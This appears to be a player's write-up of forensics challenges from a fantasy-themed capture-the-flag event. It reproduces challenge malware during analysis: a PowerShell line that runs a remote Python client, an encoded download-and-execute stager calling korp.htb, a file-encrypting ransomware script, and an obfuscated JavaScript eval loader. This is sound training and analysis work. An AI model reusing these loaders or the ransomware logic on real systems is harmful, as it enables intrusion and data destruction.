Cyber Apocalypse CTF 2025: Tales from Eldoria writeups
Intro
This page contains my writeups for the challenges I solved for my team Hackpocalypse. While I mainly focused on Forensics, I also solved some challenges from other categories.
Overall, this was a very entertaining and high-quality event by HTB and I particularly loved the Fantasy / MMOesque vibe of it!
Enjoy!
Forensics
A new Hire
Difficulty: Very easy
Question: The Royal Archives of Eldoria have recovered a mysterious document—an old resume once belonging to Lord Malakar before his fall from grace. At first glance, it appears to be an ordinary record of his achievements as a noble knight, but hidden within the text are secrets that reveal his descent into darkness.
Flag: HTB{4PT_28_4nd_m1cr0s0ft_s34rch=1n1t14l_4cc3s!!}
The challenge provides us with a docker container and a .eml file. Here is the content of the email:
From: "Elowan" <elowan81@eldor.ia>
To: "Work" <work@eldor.ia>
Subject: Job Application - Resume Review
Date: Mon, 01 Jan 2024 12:34:56 -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7bit
Hello Work Team,
I hope this email finds you well. We have received a new application for the open position, and we wanted to bring it to your attention.
The applicant, Lord Malakar, has an extensive background in leadership, strategic planning, and resource management.
With years of experience commanding large-scale operations, overseeing tactical deployments, and influencing key stakeholders, Malakar believes he would be a strong asset to your organization.
Key Highlights from His Experience:
Strategic Leadership: Spearheaded large-scale initiatives that reshaped industry landscapes.
Crisis Management: Adept at handling high-pressure situations and making decisive calls.
Team Motivation: Known for fostering loyalty and rallying teams toward ambitious goals.
Innovative Thinking: Developed groundbreaking methods to enhance efficiency and control.
We believe Malakar’s skills and experience could be a great fit for your team, and he is eager to discuss how he can contribute to [Company Name]’s continued success.
You can review his resume here:
`storage.microsoftcloudservices.com:[PORT]/index.php`
Please let us know if you would like to proceed with the next steps in the hiring process.
Best regards,
Elowan
As stated in the email, we visit the provided url, however we quickly notice that something isn’t right as the button “View Full Resume” isn’t working:
We decide to inspect the button to see what it does and find this:
Here, we noticed a weird path “3fe…1f4\resumes” and decided to take a look at it:
We downloaded the .lnk (Windows Link) file and open it in a text editor:
Afterwards, I copied the Base64 encoded string in CyberChef. Here is the deobfuscated PowerShell command:
[System.Diagnostics.Process]::Start('msedge', 'http://storage.microsoftcloudservices.com:36464/3fe1690d955e8fd2a0b282501570e1f4/resumesS/resume_official.pdf');\\storage.microsoftcloudservices.com@36464\3fe1690d955e8fd2a0b282501570e1f4\python312\python.exe \\storage.microsoftcloudservices.com@36464\3fe1690d955e8fd2a0b282501570e1f4\configs\client.py
To summarize, the PowerShell command starts a Microsoft Edge instance, downloads the resume in PDF and runs a “client.py” script from a hosted / distant “python.exe” interpreter.
We obviously downloaded the client.py file and opened it to understand what it would do:
The “key” variable immediately stands out and I decoded it in CyberChef, revealing the flag:
Thorin’s Amulet
Difficulty: Very easy
Question: Garrick and Thorin’s visit to Stonehelm took an unexpected turn when Thorin’s old rival, Bron Ironfist, challenged him to a forging contest. In the end Thorin won the contest with a beautifully engineered clockwork amulet but the victory was marred by an intrusion. Saboteurs stole the amulet and left behind some tracks. Because of that it was possible to retrieve the malicious artifact that was used to start the attack. Can you analyze it and reconstruct what happened? Note: make sure that domain korp.htb resolves to your docker instance IP and also consider the assigned port to interact with the service.
Flag: HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}
This challenge also gave us a docker container and PowerShell file, “artifact.ps1”. We open it in a text editor:
function qt4PO {
if ($env:COMPUTERNAME -ne "WORKSTATION-DM-0043") {
exit
}
powershell.exe -NoProfile -NonInteractive -EncodedCommand "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="
}
qt4PO
We decoded the command using python3…
And used “curl” to see the contents of “http://korp.htb/update":
This “update” file was used to download another file called “a541a.ps1”. We notice however that a special header is applied to the HTTP request. If we try to curl this powershell file again, we get a 403 Forbidden error:
We add the header to our curl command and get the contents of the PowerShell script:
Finally, we wrote a small Python3 script to decode this and get the flag:
import binascii
a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f39723334375f314e56336e3730727d"
result = "".join(chr(int(a35[i:i+2], 16)) for i in range(0, len(a35), 2))
print(result)
Stealth Invasion
Difficulty: Easy
Question: Selene’s normally secure laptop recently fell victim to a covert attack. Unbeknownst to her, a malicious Chrome extension was stealthily installed, masquerading as a useful productivity tool. Alarmed by unusual network activity, Selene is now racing against time to trace the intrusion, remove the malicious software, and bolster her digital defenses before more damage is done.
Flag: N/A
Question 1: What is the PID of the Original (First) Google Chome process:
The file we are given is a memory dump from Selene’s computer. To analyse it, we’ll use volatility3, and in this case, the windows.pslist module
Answer: 4080
Question 2: What is the only folder on the Desktop
For this, we use the windows.filescan module, coupled with a grep for “Desktop”:
Answer: malext
Question 3: What is the Extension’s ID
Same process as before, but this time greping for “Chrome” and “Extension”:
Answer: nnjofidhjilebhiiemfmdlpbdkbjcpae
Question 4: After examining the malicious extention’s code, what is the log filename in which the data is stored
Here we use the previously found extension ID to locate the log file:
Answer: 000003.log
Question 5: What is the URL the user navigated to
Using the windows.dumpfiles module, we get the log file
Opening it reveals the website visited by Selene:
Answer: drive.google.com
Question 6: What is the password of selene@rangers.eldoria.com
The password can also be gathered from the same log file
Answer: clip-mummify-proofs
Silent Trap
Difficulty: Easy
Question: A critical incident has occurred in Tales from Eldoria, trapping thousands of players in the virtual world with no way to log out. The cause has been traced back to Malakar, a mysterious entity that launched a sophisticated attack, taking control of the developers’ and system administrators’ computers. With key systems compromised, the game is unable to function properly, which is why players remain trapped in Eldoria. Now, you must investigate what happened and find a way to restore the system, freeing yourself from the game before it’s too late.
Flag: N/A
Question 1: What is the subject of the first email that the victim opened and replied to ?
We open the provided “capture.pcapng” file using Wireshark and we immediately noticed a lot of HTTP traffic:
We then dump all files using the built-in file dumper…
…and parse each eml files (some of them appear to be encrypted), until we find this one:
Answer: Game Crash on Level 5
Question 2: On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM) (for example: 1945-04-30_12:34)
We continue to parse the dumped emails and found this one with a zip file attached:
Answer: 2025-02-24_15:46
Question 3: What is the MD5 hash of the malware file?
Here, as the ZIP archive password was written in cleartext, I was able to extract its contents and generate the md5sum for the suspicious file it contained:
Answer: c0b37994963cc0aadd6e78a256c51547
Question 4: What credentials were used to log into the attacker’s mailbox? (Format: username:password)
In Wireshark, we filter the traffic on the IMAP protocol and get the credentials in cleartext:
Answer: proplayer@email.com:completed
Question 5: What is the name of the task scheduled by the attacker?
First, I ran a “file” on the extracted file to see what exactly we had to work with:
Then I ran “strings” to try an gain some glimpse of information:
From this, we learned that this is a .NET executable. After a quick search online, I found the perfect tool to statically analyse .NET executables: dnSpy. So I started a Win 10 VM, and opened the suspicious file:
The structure of the program was nicely disassembled for us and we found this xor function:
We also found this “cmd” function. We understand that the attacker is using the email server as a C2:
From all the info we gathered in the disassembled .NET file and after some browsing on the Internet, we realize that the encryption mechanism isn’t a simple XOR, but it incorporates the RC4 encryption algorithm and an XOR. We write a python code that will decipher the base64 text we found in the email bodies using the key found in the “xor” function above:
import base64
def decrypt_rc4_base64(key_bytes, encrypted_base64_string):
try:
encrypted_bytes = base64.b64decode(encrypted_base64_string)
decrypted_bytes = rc4_crypt(key_bytes, encrypted_bytes)
return decrypted_bytes
except Exception as e:
print(f"Decryption error: {e}")
return None
#example usage
key_bytes = bytes([
168, 115, 174, 213, 168, 222, 72, 36, 91, 209, 242, 128, 69, 99, 195, 164, 238, 182, 67, 92, 7, 121, 164, 86, 121, 10, 93, 4, 140, 111, 248, 44, 30, 94, 48, 54, 45, 100, 184, 54, 28, 82, 201, 188, 203, 150, 123, 163, 229, 138, 177, 51, 164, 232, 86, 154, 179, 143, 144, 22, 134, 12, 40, 243, 55, 2, 73, 103, 99, 243, 236, 119, 9, 120, 247, 25, 132, 137, 67, 66, 111, 240, 108, 86, 85, 63, 44, 49, 241, 6, 3, 170, 131, 150, 53, 49, 126, 72, 60, 36, 144, 248, 55, 10, 241, 208, 163, 217, 49, 154, 206, 227, 25, 99, 18, 144, 134, 169, 237, 100, 117, 22, 11, 150, 157, 230, 173, 38, 72, 99, 129, 30, 220, 112, 226, 56, 16, 114, 133, 22, 96, 1, 90, 72, 162, 38, 143, 186, 35, 142, 128, 234, 196, 239, 134, 178, 205, 229, 121, 225, 246, 232, 205, 236, 254, 152, 145, 98, 126, 29, 217, 74, 177, 142, 19, 190, 182, 151, 233, 157, 76, 74, 104, 155, 79, 115, 5, 18, 204, 65, 254, 204, 118, 71, 92, 33, 58, 112, 206, 151, 103, 179, 24, 164, 219, 98, 81, 6, 241, 100, 228, 190, 96, 140, 128, 1, 161, 246, 236, 25, 62, 100, 87, 145, 185, 45, 61, 143, 52, 8, 227, 32, 233, 37, 183, 101, 89, 24, 125, 203, 227, 9, 146, 156, 208, 206, 194, 134, 194, 23, 233, 100, 38, 158, 58, 159
])
eml_array = [
"bWCfVNLNXHGo4IA=",
"bmyFXJ7VSWCoqJMGf1qLIR7+UZSgihkAN9Sal6T7m7heF/CN1N1UPw3PsM8lg6MCSxHjnb0=",
"amKES9/XRHao4JUAOnieNEq4SpSsnQUdN86BiL77jrcGNvCXsptYBGnBic4hkrAdTxHrvv1buimrxfneAZu3A8dSQvmIsR3eb3COTLLrxtzs4Bhxtos5sLmVEfd0dHRMQnDDzCo5Pl+KQdi4xP+nSaenTD+5CesD6cL8b10VJX5CgXdMYc/KNsKNUWzTSQJyHApu5F6iR/LQ64AaeU3oDQpTOqXMcQBfpNLfC+es5/yY5K0wzHae8Yhkaap7rBCgplJY5E7hiOCNjLdWAXuzadw6z6VOUJIY/B56EReI0CVZNfqgQBHEiLbI",
"d2SYH8vXSneoq5MELGyaIQXlSsusnjwAJ9HDlbSy27cWOw==",
"d2SYH9LLTGTkqIQdKmnKEA76V5TlvQgBNdKclaOykLMELOqJ4tteAnjD1sAykw==",
"d2SYH9LLTGTkqIQdKmnKEA76V5TlvQgBNdKclaOykLMELOqJ4tteAnjD1sAykw==",
"a2SLH8/RSnfx7745E1TKfgy3HIrtvQ8EO9SXxfC9gPYgGtimwe4MWTo=",
"fWieH/2ecyWnvNZdPTmWcQz+UJ7/ug5TdtaSlKPlm6QWfQ==",
"dG6eWp6GbD/UmoUXLWq2NQ/hE4n5vgwcJtKvpqDisLcGPsO1/ddNGhWhi8AgkpEBQQDws6Fbng75icrDSbqwGNlOSdu7iAfYZHCIVLbr6fW0ri18taI5qrzpa8VyemxaGEjUygtyO1KbEA==",
"dG6eWp7nFVnqrpUZKmmZDQnlW57poAgaNcqAyaTqgA==",
"VGiPTdHXQGP876EbMX2FJhm3ZazpvA8aO8jT1uC8xPhDZq/Np5oZQnHUpKxc36FHBznusaFRsSPtnJzlC4qyGNxcWMCIs1qdVzygFbDj0se4vntsvpU9rKvQPLcPERIjLB36+ws5PVmzVsnuxNmgUPegSj+VPrRfrcHkaE0VL2hOwFIfT8iFNsaVDmnmTwc4DwNxqVqvTfOSr5YCFzLYZhlGMKbBYwhRks/IUuS31pSyoY02zA2T/8MtRORCihusuiBB6lfwkOSDyvxAAS2eTNoqirpJX4oJpFo3HRzFiGt7Tf/hYDvgs4HhXNNUHiBTgR/ckAwJHX0PoBDbTYvxQCtWNytjzQFjF8ir6ihZqFEEUibY3Enkx73tO7zgG5MDXHNRxF6dk7NdM6hcR3RNywIGvr09k/HumgOhs6MgvrHuNauqVWR5t0N52Pf21A6gTNGVtkRfBdnH/vMwOY7egIIxRNR7BlDnaeBlOfmE4aPu5C7BjLhQkwQUcC2mtMa0Sy7vtm+oqIn5po/BFqKsfdreOrYrX3XZ+98F1KC+RVKLPH9pBKd0kH9jHbAMY19YPKl5dok4ls491gXmpv+tb9aPq6PAPkHtAj0ftml7fg=="
]
for eml in eml_array:
decrypted_data = decrypt_rc4_base64(key_bytes, eml)
if decrypted_data:
try:
decrypted_string = decrypted_data.decode("utf-8")
print(f"Decrypted String: {decrypted_string}\n")
except UnicodeDecodeError:
print("Decrypted data is not a valid UTF-8 string:", decrypted_data)
And here are all those emails decrypted:
Answer: Synchronization
Question 6: What is the API key leaked from the highly valuable file discovered by the attacker?
The API key was extracted in the same way and can also be seen in the screenshot above.
Answer: sk-3498fwe09r8fw3f98fw9832fw
Cave Expedition
Difficulty: Medium
Question: Rumors of a black drake terrorizing the fields of Dunlorn have spread far and wide. The village has offered a hefty bounty for its defeat. Sir Alaric and Thorin answered the call also returning with treasures from its lair. Among the retrieved items they found a map. Unfortunately it cannot be used directly because a custom encryption algorithm was probably used. Luckily it was possible to retrieve the original code that managed the encryption process. Can you investigate about what happened and retrieve the map content?
Flag: HTB{Dunl0rn_dRak3_LA1r_15_n0W_5AF3}
We are given two files: a “map.pdf.secured” and a ZIP-archive “Logs.zip”
The Logs folder (extracted from the archive) contains a lot of .EVTX files.
Those files are part of a centralized Windows event log service and can typically be viewed using Event Viewer. However, Eric Zimmerman developped a series of tool that can assist us in our task.
We will use:
- EvtxECmd.exe (to parse the .evtx file and output a .csv file)
- Timeline Explorer (analyse .csv files without opening a program like Excel)
First, in a Windows 10 VM, we use EvtxECmd.exe:
Next, we use Timeline Explorer. When scrolling through, we find those lines that immediately alert us:
We decode them using CyberChef and we obtain the following script:
$k34Vm = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$m78Vo = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$a53Va = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$b64Vb = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$e90Vg = @{}
$f12Vh = @{}
For ($x = 65; $x -le 90; $x++) {
$e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
}
function n90Vp {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m78Vo))
}
function l56Vn {
return (a12Vc $k34Vm).Split(" ")
}
For ($x = 97; $x -le 122; $x++) {
$e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
}
function a12Vc {
param([string]$a34Vd)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a34Vd))
}
$c56Ve = a12Vc $a53Va
$d78Vf = a12Vc $b64Vb
For ($x = 48; $x -le 57; $x++) {
$e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
}
$e90Vg.GetEnumerator() | ForEach-Object {
$f12Vh[$_.Value] = $_.Key
}
function l34Vn {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
}
function s78Vu {
param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)
if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
return $null
}
$y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$a34Vc = l34Vn $t90Vv $y90Va $z12Vb
return [Convert]::ToBase64String($a34Vc)
}
function o12Vq {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($q56Vs in l56Vn) {
$d34Vp = "dca01aq2/"
if (Test-Path $d34Vp) {
Get-ChildItem -Path $d34Vp -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$q56Vs$" } |
ForEach-Object {
$r78Vt = $_.FullName
if (Test-Path $r78Vt) {
$s90Vu = [IO.File]::ReadAllBytes($r78Vt)
$t12Vv = s78Vu $s90Vu $c56Ve $d78Vf
[IO.File]::WriteAllText("$r78Vt.secured", $t12Vv)
Remove-Item $r78Vt -Force
}
}
}
}
}
}
catch {}
}
if ($env:USERNAME -eq "developer56546756" -and $env:COMPUTERNAME -eq "Workstation5678") {
o12Vq -p34Vr
n90Vp
}
After a bit of cleaning and reversing, we undersand how the “map.pdf” file was encrypted (a double XOR followed by a Base64 encoding) and get both encryption keys:
# $c56Ve = FromBase64 $a53Va
$c56Ve = "5xsGObjHQiPAGdzLgBEeI8u0YSJq76Eiyuf8wARS7qbtP4ntQY50yH8dzKZeCAsZ"
# $d78Vf = FromBase64 $b64Vb
$d78Vf = bytes.fromhex("9f69a65da5b2e692f8929356afb6dc8042b131e531e74309")
function DoubleXorThenBase64 {
param([byte[]]$array, [string]$u12Vw, [string]$v34Vx)
if ($array -eq $null -or $array.Length -eq 0) {
return $null
}
$k1 = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$k2 = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$res = DoubleKeyedXor $array $k1 $k2
return [Convert]::ToBase64String($res)
}
function UnBase64ThenDoubleXor {
param([string]$base64, [string]$u12Vw, [string]$v34Vx)
if ($base64 -eq $null -or $base64.Length -eq 0) {
return $null
}
$array = [Convert]::FromBase64String($base64)
$k1 = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$k2 = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$res = DoubleKeyedXor $array $k1 $k2
return $res
}
We can now load the “map.pdf.secured” file in CyberChef and decrypt it:
We simply need to open the PDF to get the flag:
Tales for the Braves
Difficulty: Hard
Question: In Eldoria, a once-innocent website called “Tales for the Brave” has become the focus of unsettling rumors. Some claim it may secretly trap unsuspecting visitors, leading them into a complex phishing scheme. Investigators report signs of encrypted communications and stealthy data collection beneath its friendly exterior. You must uncover the truth, and protect Eldoria from a growing threat.
When debugging JavaScript, ensure you use a Firefox-based browser.
Flag: HTB{APT_c0nsp1r4c13s_b3h1nd_b3n1gn_l00k1ng_s1t3s}
For this challenge, we start a docker container and access this page
We try to fill in the form be we don’t see any POST nor GET requests upon subimission:
I thus started to look at the ‘index.js’ code. Here is the first part of the script:
var _$_9b39 = (
function (n, w) {
var r = n.length;
var j = [];
for (var e = 0; e < r; e++) {
j[e] = n.charAt(e)
};
for (var e = 0; e < r; e++) {
var d = w * (e + 439) + (w % 33616);
var a = w * (e + 506) + (w % 38477);
var v = d % r;
var p = a % r;
var x = j[v];
j[v] = j[p];
j[p] = x;
w = (d + a) % 3525268
};
var c = String.fromCharCode(127);
var q = '';
var m = '%';
var t = '#1';
var o = '%';
var u = '#0';
var k = '#';
return j.join(q).split(m).join(c).split(t).join(o).split(u).join(k).split(c)
}
) ('Ats8ep%%e6Sr%prB%feUseEynatcc4%ad', 1198358);
;
;
As you can see, it is obfuscated. We copy it and paste it in the Browser’s console to see what it does:
Here is the second part of the script :
eval(
CryptoJS[_$_9b39[1]][_$_9b39[0]]({
ciphertext: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](
btoa(
unescape(
'bû3ÀÜ\\Q bð#S="ÔIõ[@ÓK¬È5\t\tfZ~=ÊæÍCí¹ VÓ#¬ù$¾ßJ×0d¾É\x00C\'pÝPk§ª¼ºÃ1^ç$ÃeiÛ¡¨yàV½Ä¡\nF{Ëv¶Kì¯pK3@ðtaùv\t¿Zz¾¶I[((\vÝCÖC¡+¸æk;,\nÙx^èçý(yFMît·ý©æ
¨á§DL!PV̪ïveÍ!uAoËn¥Uô3C\n\\ôÙ%:Æáv5ïùÔ½NH(Vi@<±áÙ¾^"T&þ"\x00ØôuxRÚ7ºF¦Ô\v¶¿/aÉVH
m1fùú/ñ6y ç²/¶¹
§¬ÅÊZ3
>oCvg\nС»/&Ê0ë#Ç
¬Ws/(J¥ìÑ[Ew0GÄ;
Ëé3é{öѤ\nªA^ú«ôhȦ7ì!VرÌ#t/{
7lØÈ\fj:³q)¬¹MïøâDå¿üSÏ&ÎòFYMñ,áV@X¨¬òc
s´µ³A7ø4ôYÐJµÆfDB&òøu¥lA¸aÔèÝÉü}~åHC..Mæxú¡÷ì³o:ϧ¿óQ| 0Àþ;RA˯⨣\'uÞ¨ÿ\\Tiõ{ Ïey¶ü7C|ÍhæÓç¸@
8ÊC½v¯\f\rÚI\v_>¢óÕEøÝ
WSDk;§ßJ@ìèæ@yW ÿ BmWU¡?n×÷¢òz\r^Î-ÅÃq*z=õÃÊ-iK[aÍUÆæû8¡ûѺb¾1rïÀÖVÿÚþÊr¼%y¸UÅq\fÔY0"ÌÈ][w\t¢8T?¼Í 9ÞFWE ÿ
/,2ê)5¡÷HÖ\nLDÒ+#ù"D
Öa¯K
Ü3ó¡úPÎ\x00$ÉEa§¼tX¶Ôj»\'ضE}0]4#B[= ó2ê@k#ê©=lzÊ#ÌX_HÏÐOvÀxr\rq"c¶}éÓK§í÷«-¹òé/bî<@À§e¹/Üä¼ýç#,f\n$ò䮣Áh}
XÕG[\n*¶A:¨
Ý|]á¸ú\t¸ÁD]n}
4v·ÔYLÍ-G ê*9¥ßAÿ\x00Æ;à%ôÀû[8ú17ºnÛ½tOG9¸G
ö¿ç)J1ÈE´ÿ\tR¼þÃj}ä¨\v~T²XõÝDTùgr°ÝöGÃÕ£®<Q>Þ¼Ae$gEu.¯7Í\x00bciÄ;e÷ÉCü^XF*YtÐAÓi\'ES§ôe<ÕÎfw¡Ø;êT?;î轶@þ\tqÚÔ>ebñÊësa¤¶kªÚÚú{^SIíïX]Al
¦M¨
\v
IBjÚlÍÝÃI÷äII\'ä¨Eiõ\n\tEͼuGV¾*&Àè|N\r;èºbGìÔ= #T©"éÝzFÑ"t Ko?N±
ÖÙ
=êïD`MH9ØÔ)âVäI£V®¬RØû~xm¯ée ¤À}À
rÏûÝùçH=í¨Uúpó 4áÄ\r¡U\x009¾pxQ0º#ÂøoEµ¾¥1xx¸.Ài7ã}%+ïUâx)§gYj¤ ½®qWCIÔ4iã
+c»§ß\\Æ\fv\v?ÙµÔØdäúø8#æ¨"¶GÝ^ÖÎ
>¥ÇqN\tÊ#¦xýÂS?þ¡+Q\x00æÿÅEsºaJ®ÈÏ6Dþr¿±\\QëÉó ¸qúFÔrEªöâ¡\nI>ËËé°06z¦* Û±¨[[
ê.«\r]£ èÊ×\v=/9ok\r:%ÌîÞl7}Dbb3GÙ\r£áõCó¤ónq!Ö\fçv4¬!+ÓÂòr+ƨCöÙ¹Og{@
ü?ÓynéÇê§\tT0DaÜöWÅ\x00&34y!¼§2×Ê)1\x00
1E\tÙø%Øäú¸¥ üæ/ð£!äq
é\'zpr×-â§H÷râÇ©Ôçñv
1çÓïÔØÅ ÿéAêé-Zl¨vrr<æ¡Çï»Un0ävùú,d®\rØ@ZÄ9äjµaþ ºpZ:3öâáv³h2Ì@ûå)RüË\nßìûª4<¡Ô¡KÇroÏ×.ɵÆ9E¢xRè¬åO\v@îô%¸ÒR(íå)Ýv\n¹?Øë<Ú¡Znj4*q\\⹨GF©^VS>í(æPªÃ-ÁN%}[0¡
<ü{Ñ\vɳ .e4"ÔyS}Ð[¢`½\nm}Õ¦gÈn|kÈ\rä&.¿D\tÓG<j(ÜòA¯2¬÷}\'L³Ñ··U ì%ªÐ¾h"Àãs¡¾ÛÃH6CF$?ú[;êïÁ`¡ÝñuÜOêùd\nN
ø¨ã?¸
iü~åg?¹§éTióxà\tÎÇùªÄß;e(Ud eÏoÞ`êØúÑôÊÊÇÑl+¯ÇÁ¨ê\r¹Xú¼+oÈ
;qc#{ëx4d1¿BÏQ§>¡_uó&\x00Õ&þw8
\fáÛ Ã º5Ý] Üà?ÇR«ìÀ!»03ñ§b¿.vPÎ\\\\Ei¹,_ݹ0M\\ý*ÍïÈ_ïîI¶Â£»ñ*.?ÀlHÒVàJOQãÅ×áJ!\fADÊãØ þÂá^¿»¤nH¶,\vgrb·óBæI¬÷(¾<ã]Wósø§Ob)=É×Æ߸ú«dU`b[Ñæ:²ÞE½}Üð
ÛÁÑíAWÑ2Ê"`ýC¨sA7[Ëws<rÍè~XÕÁÓP,eðÎ æZ·|¾BEoÜ.ÖøºZ«<%ÂY4g²ßçO¸F\r,Öyúp>þ#\'ÃöÑ×Õ÷½HÏb£^+N{ùÔÓd ×÷À¡¬Áð»5o2`;ËØQBüñ&<ClÑn·$BÎM@=¨«ÆÐxïy:i.þ#ú
·Ró}nÃzÐ[Ý|Ü.~ÐeÎßþÌ=À¡ÂÖ £fÝÍÌäcàÝó\rumf\nÒ°ÈDZkÜÌÀ¡e
r¼DÀ¨÷¹©¸I]ǵ*AK@6F¦Á5ÐíºÊrÜJgoð\tîÀE=´oiGÄ]¸á¼è[ ѲÜ&Ë1/RQe°í²)þ³+¿¡4HÃuL®×ÌHóÕ!忼µZæ×ã$\\îkñLDNå\rçkç¶Ë»\vkQ6ñ1Iî¦MpÑ1>¨_Ä5þÏÂ
ài1@¸ÎòÇÏS§µe\\ØÿA³ûKò:µÈg®daü_ã@¸ü\f«XIi§8HvØ{glªöàh\rrùäquîð¯ia¿Þ§Ý»Ëo<kïúZüÿëS&÷§\vJתز=Ü<»ZÕ°Ëañµ?£8ìÞIò÷¶¼^Ú.S`è[ÇôºNf3QÑÁ"«».ë-u%7x^òHg¹1\r]QÈÕ}¢û¼ÜB-þê/ñ/
i!ÃT@
kÑ()}Y¶oDùö²ywÔ@È
7L4Ô/ðXöú¶ºåãXrå3?ã
0!û4ÈàD~:ÏÈ-¾¤`LwÎ
S
ÎÕä2´2JÑähÉ{ôt.ôÖI¿wW·ä66vu/(Kh¼_<êÐÌPØÁtdËDëNJÏú\tnËÏý%·£\fT)ʽ\\qg@.]tn5ô\nà1Ò9î½×cöb÷_QRÞ!.ðXVLÙbF÷Ø·vÀí]A˾ÖÏ0o2¦-uª<\tòÇ»ÏÉÃRÍ?gòkµÞH:\f¢ä½¿Ù{Ï~?°A¬¬KZ89
ÔÊéÍÚåÑGú~äêÙC¿§Ø·NßT`åHDåÒWÇ÷ \'RÍÒjâé Ѭ÷ÈéÈFe´~~|ñ¹éc®DýpÅØØ¥CÔ©
`# Öý\r¿îf
rá¡ß|úâÙñÐ<&O:äÍ\x00ì\vn!óñX*(Ëk¶xô¸è¨O|
bï´Í¦I9Ï;»qPÂÎXú4À _zælzÂWC¦S&`¦SâéGHò¾~lLæ$¬êN²7I,±¹Á
ÉêÕW:¦3ÉiÜ\n+
ë13ømYÀuéVs´çxÃr0?hfö+Dg¥8ÚÆãaÑ]µâÆû=©(\r}úlÒ¹~r>µ{®å]Sáå¥öéówɬdòï´`~Ïû¤8%2¥ÎFÝTw6jI$¼M\'9b4×mÅ&rhîÝú
nÎ]øõ{ú"ÓMR¬t_*ELChf,
j<\x00wmý8
ѧ¶è£ñ|çwÊa?A\'âæ|é°nѹÜÍÞJõ&|*dhÿ?s;y²¡¸7ô ê\x00<S*sQsù¥4^¾\féÔí#,6LÕÕ1
ÚC-ü´¹Éoê1Qôß9XSp@úâÛ¤\rjthhV-Ì+T&øÛ¬¯§û¨Ï6ör´²T_»Ìl`|ªÊËP·,
IVÌ!é>q·ÑC·(ïeÇ[^èá6$¹ÛúX
<]xäléõ ç\tàb$BÍ[
· =Ã\vÝZ@1Å"ö>TRÁC¿Â¤8ÊĹiDÞ
©ËóCÈÁOk%\x00óÁìzËÓ?ª÷Ä~èº\t[x^ñ¢k+CÐ2øüm¡&ùm\'øÂãÊ;\\6©ÓB\'Ø !Ð Ô\røEñ[Ç1O#Û/U2RÆM¶Øz2ô-§èf<ìLv÷ àLT\v0øûÊP;[Ð6_,?¼h{E¹£ä×¹ËëKò
ê\'e\rmtõ{Å
Í\vyÅ\'Ô*Ø WZJZC´¦Yàû\t¼ä_G·,Rs\v;q²ÀÒ)1(×\tuøÏízcØ\\¹ª£UÖpã+N¶
ü×V;ò¸»ÿ¶\ti jÇ|kjɤkm1}NbGÇСGwBÇZ?ù_p¯î¸©&¼+ÄR&\v\'kJù@Ç"e:yIêCä À«6~a.-÷FТg»Í¡IâC©ºQÿ`ôclä¢iÛªðÕÎjv04±Ò±ëcÜòG(¬ôïT;f±ÿ{/tH$FG2æôB¨ï@ÒòèfóXá¥Øµìõ@ìe\r
æ×nk\t|?ÓÈùçt^ªê©é3ÛØ`°£ÚhÌT;5ôbûõmÅàÍ0ßBs®3¥ÙV°Ä/@*¶°S·«!?TÇj¥¼hÌ°£K\'l¡5(ÑWjfTGà|9yVkÎ
Ë«\fì£ ¹½©bñAÜÏiv°mºöÑIù M1żqÐÕc´\'¦QKâ&ï:¶[µ2¨IÖó
,5
\x00z|ku6ù«£²½NñIÜЬt¹\tï)´uÝX\x00¾]AsLì)\rÑ=Ìó98Ø¥TD]r_Í¡£¯Óð¼kåñÎSµÒUÆR@>^ì,Õê\vÆW@`è !¼*;(¢w£ëæ5h$ªýKëTI`²U¿ lkª¿ì²¹©)h7F\fbÅôýE&\\?\\\'ó¿Éf~[CÚpe'
)
)
)
